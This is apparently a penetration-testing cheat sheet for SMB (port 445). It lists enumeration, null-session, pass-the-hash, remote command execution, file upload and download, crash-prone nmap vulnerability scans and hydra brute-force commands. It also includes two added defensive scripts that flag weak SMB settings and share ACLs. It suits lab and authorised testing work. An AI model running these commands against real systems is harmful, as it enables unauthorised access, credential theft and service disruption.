SMB (tcp-445)

SMBMAP

Null Session

The user `guest` can be exchanged with `""` (an empty username).

```bash
smbmap -u guest -p "" -H <IP> -L
```

Authenticated

```bash
smbmap -H <IP> -u 'user' -p 'pass' -d .
```

Command Execution

```bash
smbmap -H <IP> -u 'user' -p 'pass' -x 'ipconfig'
```

Connect to a share

```bash
smbmap -u guest -p "" -H <IP> -r "C$"
```

Upload a file

```bash
smbmap -u administrator -p 'smbserver_771' -H <IP> --upload "/path/to/local/file" "C$\path\to\remote\file"
```

Download a file

```bash
smbmap -u administrator -p 'smbserver_771' -H <IP> --download "C$\path\to\remote\file"
```

CRACKMAPEXEC

Retrieve Domain Info

```bash
crackmapexec smb <IP>
```

Null Session

A dummy user is needed if the machine is part of a Domain.

```bash
crackmapexec smb 10.10.11.175 -u 'abc' -p ''
```

crackmapexec can also be run with a file containing hashes instead of a password:

```bash
crackmapexec ldap 10.10.10.248 -u 'svc_int' -H hashes --continue-on-success
```

ENUM4LINUX

General info

Do all simple enumeration (-a) with user (-u) admin and password (-p):

```bash
enum4linux -a -u "admin" -p "password1" <IP>
```

NMAP

SMB Multiple Vulns

Please Note: If we set the script parameter unsafe=1, the scripts that will run are almost (or totally) guaranteed to crash a vulnerable system. Needless to say, exercise extreme caution when enabling this argument, especially when scanning production systems.

```bash
nmap -v -p 139,445 --script=smb-vuln-* --script-args=unsafe=1 10.11.1.5
```

Version of SMB

```bash
nmap -p445 --script smb-protocols 10.4.31.9
```

OS Discovery

```bash
nmap -p139,445 --script smb-os-discovery 10.4.31.9
```

Authentication verification

```bash
nmap -p445 --script smb-security-mode 10.4.31.9
```
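The output of the two checks above (`smb-protocols` and `smb-security-mode`) is what you review when auditing your own hosts for weak SMB settings. The following script is an added example and not part of the original page: it parses nmap output for those two scripts and flags SMBv1 still being offered, message signing not being required, and a guest session being accepted. The nmap output embedded in it is a constructed sample for the placeholder hosts 10.0.0.5 and 10.0.0.6, and the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page): triage nmap smb-protocols and
# smb-security-mode output for the settings a defender should fix.
# Both samples below are constructed; 10.0.0.5 / 10.0.0.6 are placeholder hosts.

SAMPLE_WEAK='Nmap scan report for 10.0.0.5
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.0.2
|     2.1
|     3.0
|_    3.1.1
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)'

SAMPLE_HARDENED='Nmap scan report for 10.0.0.6
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb-protocols:
|   dialects:
|     3.0
|_    3.1.1
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required'

# smb_findings: read nmap output on stdin, print one finding tag per line.
smb_findings() {
    awk '
        /^[|] smb-protocols/     { section = "proto";   next }
        /^[|] smb-security-mode/ { section = "secmode"; next }
        # any other script header or a new host line ends the current section
        /^[|] [a-z-]+:/ || /^Nmap/ { section = "" }
        section == "proto"   && /SMBv1/               { print "SMBV1_ENABLED" }
        section == "secmode" && /account_used: guest/ { print "GUEST_SESSION_ALLOWED" }
        section == "secmode" && /message_signing:/ {
            if ($0 ~ /message_signing: required/) print "SIGNING_REQUIRED"
            else                                  print "SIGNING_NOT_REQUIRED"
        }
    '
}

# smb_risk_count: number of weak findings in the nmap output given on stdin.
smb_risk_count() {
    smb_findings | awk '/SMBV1_ENABLED|GUEST_SESSION_ALLOWED|SIGNING_NOT_REQUIRED/ { n++ } END { print n + 0 }'
}

# Stand-alone usage: report on both samples (weak host: 3 findings, hardened: 0).
for host_output in "$SAMPLE_WEAK" "$SAMPLE_HARDENED"; do
    printf '%s\n' "$host_output" | sed -n '1p'
    printf '%s\n' "$host_output" | smb_findings | sed 's/^/  /'
done
```

With real data, pipe the output of `nmap -p445 --script smb-protocols,smb-security-mode <IP>` into `smb_findings`; each "SMBV1_ENABLED" or "SIGNING_NOT_REQUIRED" line is a host to reconfigure.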

Sessions

The script args are optional; add them if you have credentials.

```bash
nmap -p445 --script smb-enum-sessions [--script-args smbusername=administrator,smbpassword=smbserver_771] 10.4.31.9
```

Shares

The script args are optional; add them if you have credentials.

```bash
nmap -p445 --script smb-enum-shares,smb-ls [--script-args smbusername=administrator,smbpassword=smbserver_771] 10.4.31.9
```

Users

The script args are optional.

```bash
nmap -p445 --script smb-enum-users [--script-args smbusername=administrator,smbpassword=smbserver_771] 10.4.31.9
```

Statistics

```bash
nmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=smbserver_771 10.4.31.9
```

Domains

```bash
nmap -p445 --script smb-enum-domains --script-args smbusername=administrator,smbpassword=smbserver_771 10.4.31.9
```

Get more info about scripts:

```bash
ls -l /usr/share/nmap/scripts/smb*
```

Mounting

Linux:

```bash
mount -t cifs "//10.10.10.103/Department Shares" /mnt/tempMount
umount /mnt/tempMount # To dismount the share
```

Examples: Sizzle

Windows:

```cmd
net use Z: \\10.0.22.92\C$ smbserver_771 /user:administrator
```

NMBLOOKUP

Lookup by IP

Shows different permissions of shares

```bash
nmblookup -A 10.0.0.1
```

SMBCLIENT

Null session

Shares:

```bash
smbclient -L 10.0.1.1 -N
```

Examples: Outdated

Connect to a Share:

```bash
smbclient //10.10.11.175/Share -N
```

Examples: Outdated

Authenticated

```bash
smbclient //10.10.11.102 -U 'localadmin%Secret123'
```

Examples: [[Anubis]]

Download a Share

```text
# First connect to the share, then run these commands at the smbclient prompt:
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
```

Enumerate permissions on shares:

Smbcacls:

```bash
smbcacls "//10.10.10.103/Department Shares" Users/amanda -N
```

Script to enumerate permissions recursively on every folder (the file `users` holds one folder name per line):

```bash
for dir in $(cat users); do
  echo -e "\n[+] Trying directory $dir:\n"
  echo -e "\t[-] $(smbcacls "//10.10.10.103/Department Shares" Users/$dir -N)" | grep "Everyone"
done
```

Examples: Sizzle
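The loop above greps smbcacls output for "Everyone". As an added example that is not part of the original page, here is a small parser for smbcacls' `ACL:` lines that reports any ACE granting a broad principal (Everyone, Authenticated Users, Domain Users) write rights, which is the finding a share-permission review should surface and fix. The ACL output embedded in it is a constructed sample in smbcacls' `ACL:<principal>:<type>/<flags>/<mask>` format; CORP, amanda and the function names are placeholders chosen for this example.

```shell
#!/bin/sh
# Added example (not from the original page): find ACEs in smbcacls output
# that give broad principals write access. SAMPLE_ACL is a constructed
# sample in smbcacls' "ACL:<principal>:<type>/<flags>/<mask>" format;
# CORP and amanda are placeholders.

SAMPLE_ACL='REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:CORP\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:CORP\Domain Users:ALLOWED/OI|CI/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI/FULL
ACL:CORP\amanda:ALLOWED/OI|CI/CHANGE'

# broad_write_aces: read smbcacls output on stdin and print "principal:mask"
# for each ALLOWED ACE where a broad principal has FULL, CHANGE or a W bit.
broad_write_aces() {
    awk -F: '
        $1 != "ACL" { next }
        {
            principal = $2
            n = split($3, parts, "/")     # type / inheritance flags / mask
            type = parts[1]; mask = parts[n]
            broad = (principal == "Everyone" ||
                     principal ~ /Authenticated Users$/ ||
                     principal ~ /Domain Users$/)
            write = (mask == "FULL" || mask == "CHANGE" || mask ~ /W/)
            if (type == "ALLOWED" && broad && write) print principal ":" mask
        }
    '
}

# broad_write_count: how many such ACEs the input on stdin contains.
broad_write_count() {
    broad_write_aces | awk 'END { print NR }'
}

# Stand-alone usage on the sample (prints "Everyone:FULL"). With real data,
# pipe in the output of: smbcacls "//<IP>/<share>" "<path>" -N
printf '%s\n' "$SAMPLE_ACL" | broad_write_aces
```

Run inside a loop over folder names like the page's own script to get one report line per folder; an empty result for a folder means no broad principal can write there.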

HYDRA

Get the correct password by bruteforcing:

```bash
hydra -l user -P /path/to/wordlist <IP> smb
```

Exploitation MS17-010 on Windows XP

Manual exploitation can be found at MS17-010

Reference:

setup manual MS17-010 for Windows XP